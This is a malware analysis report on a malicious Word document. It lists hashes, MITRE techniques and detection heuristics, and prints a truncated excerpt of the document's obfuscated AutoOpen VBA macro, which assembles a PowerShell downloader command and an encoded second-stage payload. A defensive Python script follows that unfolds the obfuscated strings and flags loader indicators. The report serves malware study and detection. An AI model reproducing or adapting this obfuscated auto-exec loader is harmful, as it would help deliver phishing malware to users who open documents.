Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60cd99886e9e2830…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 238.0 KB
Created: 2018-07-06 10:20:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 2a4e69a7cf4c51df72fa1941af1a6924
SHA-1: 6dafc1372f6ec0d779c66c3e56f9cd66cb9281e9
SHA-256: 60cd99886e9e2830135ef5e694cf1d4efe3ccdfc24d35c13757bb62ee88ef750
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document carrying an AutoOpen VBA macro that runs as soon as the document is opened with macros enabled. The macro is heavily obfuscated: the working code is buried in junk arithmetic on variables that are never assigned (the resulting run-time errors are silenced by On Error Resume Next), and the PowerShell command line is assembled at run time from short string fragments and Chr() calls. The reconstructed command is handed to CreateObject and Shell calls, which points to downloader or dropper behaviour; the second-stage payload is only present in the visible source as a number-encoded string that is decoded before execution.

Heuristics (8)

  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source contains a Shell() call, i.e. a direct process-execution sink.
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    The auto-exec procedure reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the CreateObject/Shell/URL indicators out of the macro source text until run time, so plain keyword scanning of the source misses them.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro source contains a CreateObject call (COM instantiation, typically used to reach WScript.Shell or a similar execution object).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see the extracted macros.bas below), so this marker adds little beyond the AutoOpen finding.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier found in any document that embeds drawing markup; it is not an endpoint the macro contacts.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                               | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)  | 9696 bytes
SHA-256: 196e918f04112ad39e411aaa0f46eca82104254e7b706bddc65f0cf72342121f

Preview, first 1,000 lines of the extracted script (the listing is truncated):
Attribute VB_Name = "djcjdvvaZtdGm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MKczL = qwqzj - KwRHhC + (79367 + NLTTA + YjPQl * QtjsqJ - (54187 - viKvE + SqiWX - isEArJ))
   zjQDsi = dJYXki - jToLW + (5951 + WrUan + ZLrMMH * ANcsVZ - (36741 - LsDTGn + miBtoj - ovdFoY))
   tJjZMp = RSYQY - XifAXO + (93403 + iCttA + YpfBh * oXlBl - (68754 - sAYFG + KLOYAU - ziLGnj))
   NPJPNw = ZOQESp - WuBrRa + (22378 + NSBJc + itaqq * HibQi - (94147 - bvkiDn + oMoFjG - tCrNDW))
   bmWjKm = sdPnzE - Kzntp + (1244 + QfhmN + MiOFX * FZliWo - (45753 - Vuljv + iAJAmV - dLHpwz))
sSwRwRKCPNbvqO (juXhcE + tGCDDBEp + wVTFBFA)
   jhdur = wiPVA - bYCXzD + (7988 + Dcmwrq + LZRkA * jJVTRo - (79596 - prujD + DNzDo - WKGui))
   pNbRj = TkIUaj - dkwWn + (48064 + FUKjw + cjCfa * hauUcV - (15524 - tDzLjr + YHPjj - cPVCrV))
End Sub


Attribute VB_Name = "znJwlzp"
Function juXhcE()
On Error Resume Next
DhfcF = (dwSsW + zViBf) * (PqFwY * pAuLm / bzwjNc * mICSr)
   wvAkmI = 51131 * miNFJ * nFfSM / RYcSIF - sKMYNB / XtAKZd
SmIiwWn = "wershell " + "     " + "      " + "       " + Chr(34) + "$" + Chr(40) + "Set" + "-ITEM  '" + "VARIa" + "bLe:OF" + "S' ''"
STHSM = 98547 * WAfQI * Thbji / OZGzDL - tEVtiS / NJzAm
   CfNTA = 97092 * SffbzC * jCwws / TiLvLB - ZJZdcI / ibkRp
   lnAko = 50958 * zfwjtn * oQlmv / QlGwlq - CiBlki / NOGMJT
   LVFJj = 68223 * iENLa * sYURI / DWIGCw - wRFRjI / THIFm
   HpXikp = 98902 * Tiswio * MTEGXF / BHwwtJ - ibtNo / jiRSW
pZmHXwf = Chr(41) + Chr(34) + Chr(43) + " [St" + "rinG]" + Chr(40) + " '2" + "2M100!1" + "17p106B1" + "5!92%87i6" + "9@31!93@8" + "0%88p87@" + "81M70!18" + "%124n87S7"
qFMSCB = 22306 * HSJqf * DPDKsl / dmjCQn - POijjW / Dujwpm
dwGNZXNkHd = "0!28V10" + "1V87p8" + "0V113" + "S94M91" + "p87B92S" + "70V9B2" + "2p90p11" + "9S101%" + "15%21" + "n90i70"
XRdiEs = 4164 * ijlNSf * lNZus / cKJFzV - ODwpf / JkmEhX
   GzEam = 58262 * dOdSb * AdpSRp / GtoMUU - ZZQwvq / RjJFvR
   wzkRk = 28892 * KcMLF * uHUdE / iNfiv - iVfwIs / fliKY
lLHjWGkk = "%70B" + "66!8i2" + "9!29V" + "69n6" + "9n69p28" + "@65p70%95" + "p83i64%7" + "5M65%89" + "V83S64%" + "83V89" + "@93@94i94"
BfhPX = 4003 * LtjEIN * sGSqz / zjXkn - ujNVXZ / lmjmE
   QwAFo = 56382 * zLLkwM * iCTJjc / jjJbZs - SdNYz / pjcwQB
   iVOOs = 93404 * HbRXq * bPOHfz / ccBFf - BiXRq / zVJmAi
   dFCLl = 62844 * ZRwdb * zKUIw / oHPzXM - DbXMTN / bZsiL
SGHQJfZKHXm = "p75n28M" + "81@93" + "p95%29%" + "104n" + "65S125p" + "72%103i"
LhslE = 82680 * TrzDU * MqiPkd / iwLzcD - ZXsiwr / Xcjoo
   JVZwP = 12226 * lRBRA * oNVsI / thvwQ - cZpOv / wNVYdm
JaJDVKfsCAw = "64!29V1" + "14@90@70n" + "70V66!8@2" + "9%29S69" + "V69B" + "69%28i65" + "%64V91V9" + "5M83p9"
inFrQz = 38320 * KGqfm * cOWIr / hiXWaU - CPkjpv / OtpHA
afEYLJ = "0V83M" + "92!6" + "5M66M83" + "B64p87%6" + "5p28" + "%81n93" + "i95!29n8" + "8B90V11"
iHFvJ = 81148 * KGdLaP * QjQwK / GaXAj - JiYPIj / izQQfK
   ESYFnm = 65201 * jMTjPw * mkCYD / dnFRi - uGRjzh / FSSQoK
   FdFiV = 78315 * dFqDw * wDjELb / KlqVbw - AASllO / BwSVN
wabEdoz = "9p117M92S" + "70!29" + "S114i90p" + "70B70" + "n66B8@29" + "n29n" + "69S69B69" + "V28n6" + "5%91B" + "65M86" + "@87%81@" + "83B6"
GRCwJ = 64849 * iSpqi * fTnEDn / OcWBdt - UUOOz / JjoPk
   OWrfI = 67361 * ECtPPJ * HVMiAi / nTFPc - WZRhqu / STWZS
   wjQIr = 7340 * mwdjGQ * EduAU / jpNEa - ZRzfXU / ZsfMNK
lNfbhjcQ = "4%28" + "@81M9" + "3p29n74" + "S96B6" + "6S85%87n2" + "9%114%90!" + "70@70i66!" + "8@29n2" + "9%80i" + "83S71%70" + "!87S28V93" + "n64!85i"
wlIFU = 87618 * KAfJvC * ClPfsX / lMYUIN - wnQszz / hzJIwl
   kENZj = 51814 * vORYcQ * OcPaP / UCpsW - wHRDT / bzKDi
   Ndddr = 35818 * HNZwRp * DmPDu / vzDOT - QqPrQ / JYwjl
   Bjzwr = 31821 * JmPIhL * jkLfw / NPRvD - UnGXvl / UKrUK
TtPQk = "29%116i" + "0n4B98B1" + "07V71" + "%64@29!11" + "4B90" + "n70V70i66" + "i8p29M" + "29!69M69" + "p69V"
pbBYrP = 98479 * vvjIWi *
... (truncated)
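The listing above shows the two obfuscation layers that the summary and the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding describe: junk arithmetic on never-assigned variables (each division by an Empty value raises a run-time error that On Error Resume Next swallows), and the PowerShell command line split into short literals and Chr() calls so that no single literal contains a recognisable keyword. The script below is an added example written for this page, not part of the report or of oletools: it folds pure literal/Chr() concatenations back into their full strings, counts the junk-arithmetic lines, checks for auto-exec procedure names and execution sinks in the source, and then runs a few PowerShell-shape indicators over the folded text. SAMPLE_VBA is a constructed excerpt of the macro above (a handful of its lines, not the whole artifact); the function names, the indicator labels and the regular expressions are the example's own assumptions, not the report's rule IDs. The number-encoded string handed to [String]( is the second-stage command; the listing is truncated before the decoder, so the example deliberately does not try to decode it.

```python
import re

# Constructed sample (an excerpt in the shape of the extracted AutoOpen macro above,
# not the full carved artifact). Three lines are junk arithmetic, three build strings.
SAMPLE_VBA = r"""
Sub AutoOpen()
On Error Resume Next
   MKczL = qwqzj - KwRHhC + (79367 + NLTTA + YjPQl * QtjsqJ - (54187 - viKvE + SqiWX - isEArJ))
sSwRwRKCPNbvqO (juXhcE + tGCDDBEp + wVTFBFA)
End Sub

Function juXhcE()
On Error Resume Next
DhfcF = (dwSsW + zViBf) * (PqFwY * pAuLm / bzwjNc * mICSr)
SmIiwWn = "wershell " + "     " + "      " + "       " + Chr(34) + "$" + Chr(40) + "Set" + "-ITEM  '" + "VARIa" + "bLe:OF" + "S' ''"
STHSM = 98547 * WAfQI * Thbji / OZGzDL - tEVtiS / NJzAm
pZmHXwf = Chr(41) + Chr(34) + Chr(43) + " [St" + "rinG]" + Chr(40) + " '2" + "2M100!1" + "17p106B1" + "5!92%87i6" + "9@31!93@8" + "0%88p87@" + "81M70!18" + "%124n87S7"
dwGNZXNkHd = "0!28V10" + "1V87p8" + "0V113" + "S94M91" + "p87B92S" + "70V9B2" + "2p90p11" + "9S101%" + "15%21" + "n90i70"
End Function
"""

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# One string-building token: a VBA string literal ("" escapes a quote),
# a Chr()/ChrW()/Chr$() call with a numeric argument, or a concatenation operator.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr(?:W|\$)?\(\s*(\d+)\s*\)|\s*[+&]\s*', re.I)
# Assignment whose right-hand side is only names, numbers, parentheses and + - * /.
JUNK_RE = re.compile(r"^\s*\w+\s*=\s*[\w\s()+\-*/]+$")
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Workbook_Open)\b", re.I | re.M)
SINK_RE = re.compile(r"\b(CreateObject|Shell|WScript\.Shell)\b", re.I)
# Indicators evaluated over the folded strings, where split keywords become visible again.
INDICATORS = {
    "powershell keyword (possibly split across literals)": re.compile(r"(?:po)?wershell", re.I),
    "$OFS cleared with Set-Item Variable:OFS (joins a char array without separators)":
        re.compile(r"set-item\s+'variable:ofs'\s*''", re.I),
    "[String]( cast applied to an encoded payload": re.compile(r"\[string\]\s*\(", re.I),
    "numeric char array with one-character junk separators":
        re.compile(r"\d{1,3}(?:[^\d\s'\"]\d{1,3}){8,}"),
}


def fold_assignment(line):
    """Return (name, value) if `line` assigns a pure literal/Chr() concatenation, else None."""
    m = ASSIGN_RE.match(line)
    if not m:
        return None
    name, rhs = m.group(1), m.group(2)
    pos, parts = 0, []
    while pos < len(rhs):
        t = TOKEN_RE.match(rhs, pos)
        if not t:
            return None  # an identifier, number or other operator: not a pure string build
        if t.group(1) is not None:
            parts.append(t.group(1).replace('""', '"'))
        elif t.group(2) is not None:
            parts.append(chr(int(t.group(2))))
        pos = t.end()
    return name, "".join(parts)


def analyse(vba_source):
    """Fold string builds, count junk arithmetic, and report auto-exec/sink/PowerShell indicators."""
    folded, junk = {}, 0
    for line in vba_source.splitlines():
        result = fold_assignment(line)
        if result:
            folded[result[0]] = result[1]
        elif JUNK_RE.match(line):
            junk += 1
    blob = "".join(folded.values())  # assignment order, as the macro concatenates them later
    return {
        "autoexec": AUTOEXEC_RE.findall(vba_source),
        "sinks_in_source": sorted(set(SINK_RE.findall(vba_source))),
        "junk_arith_lines": junk,
        "folded": folded,
        "indicators": [label for label, rx in INDICATORS.items() if rx.search(blob)],
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_VBA)
    for name, value in report["folded"].items():
        print(f"{name} = {value!r}")
    print("auto-exec:", report["autoexec"], "sinks in source:", report["sinks_in_source"],
          "junk arithmetic lines:", report["junk_arith_lines"])
    for label in report["indicators"]:
        print("  -", label)
```

On the excerpt, SmIiwWn folds to `wershell` followed by a run of spaces and `"$(Set-ITEM  'VARIabLe:OFS' ''`, and pZmHXwf to `)"+ [StrinG]( '22M100!117p...`; no CreateObject or Shell name appears in the excerpt, which is exactly why the obfuscated-loader heuristic looks at the string-reconstruction shape rather than at sink names alone. The Set-Item Variable:OFS '' fragment is worth knowing on sight: $OFS is the separator PowerShell inserts when it converts an array to a string, so clearing it lets [String] glue a decoded char array into a command with no spaces. Any transform of the numeric payload (an XOR or subtraction key, for instance) sits in the truncated part of the macro and would have to be read from there before the command could be recovered.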